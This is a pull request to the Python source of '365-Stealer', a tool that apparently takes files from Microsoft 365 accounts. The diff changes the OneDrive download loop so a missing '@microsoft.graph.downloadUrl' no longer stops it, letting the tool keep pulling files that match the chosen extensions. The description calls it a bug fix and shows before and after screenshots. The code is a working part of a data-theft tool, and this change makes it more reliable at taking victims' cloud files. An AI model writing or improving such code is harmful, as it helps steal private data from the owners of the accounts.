### PR TITLE
Fixing error in downloading OneDrive files

### DIFF
--- a/365-Stealer.py
+++ b/365-Stealer.py
@@ -1166,7 +1166,7 @@ class O365Stealer(DatabaseOperations, DatabaseConnection):
             while value >= 0:
                 try:
                     # Get the download URL and file details
-                    url = response['value'][value]['@microsoft.graph.downloadUrl']
+                    url = response['value'][value].get('@microsoft.graph.downloadUrl')
                     name = response['value'][value]['name']
                     itemId = response['value'][value]['id']
                     filename, extension = os.path.splitext(name)
@@ -1175,7 +1175,7 @@ class O365Stealer(DatabaseOperations, DatabaseConnection):
                     # Create the folder to save the files to
                     
                     # Download the file if it matches the specified extensions or '*'
-                    if extension in extensions or extensions == '*':
+                    if url and (extension in extensions or extensions == '*'):
                         if self.args.refresh_all is False:
                             print(crayons.blue('[*] Retrieving OneDrive Files', bold=True))
 


### PR DESCRIPTION
# Fixing error in downloading OneDrive files

Adding check to if @microsoft.graph.downloadUrl causing error in download OneDrive on some cases.

<img width="1303" height="469" alt="image" src="https://github.com/user-attachments/assets/e1797ed3-4324-4b2d-96cc-cd9d2e221c5b" />

After the changes:

<img width="1301" height="515" alt="image" src="https://github.com/user-attachments/assets/7ea61ecf-dd8f-4ccd-9ff0-d5fc7db8de03" />

